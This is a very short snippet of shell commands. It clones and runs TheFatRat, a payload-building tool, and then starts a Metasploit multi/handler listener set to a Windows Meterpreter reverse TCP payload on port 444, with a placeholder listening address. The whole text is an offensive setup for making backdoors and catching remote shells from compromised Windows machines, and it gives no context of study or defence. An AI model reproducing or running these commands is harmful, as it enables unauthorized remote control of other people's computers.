git clone https://github.com/Screetsec/TheFatRat.git cd TheFatRat chmod +x fatrat ; chmod +x powerfull.sh sudo ./fatrat
sudo msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost "ip ente" set lport 444 exploit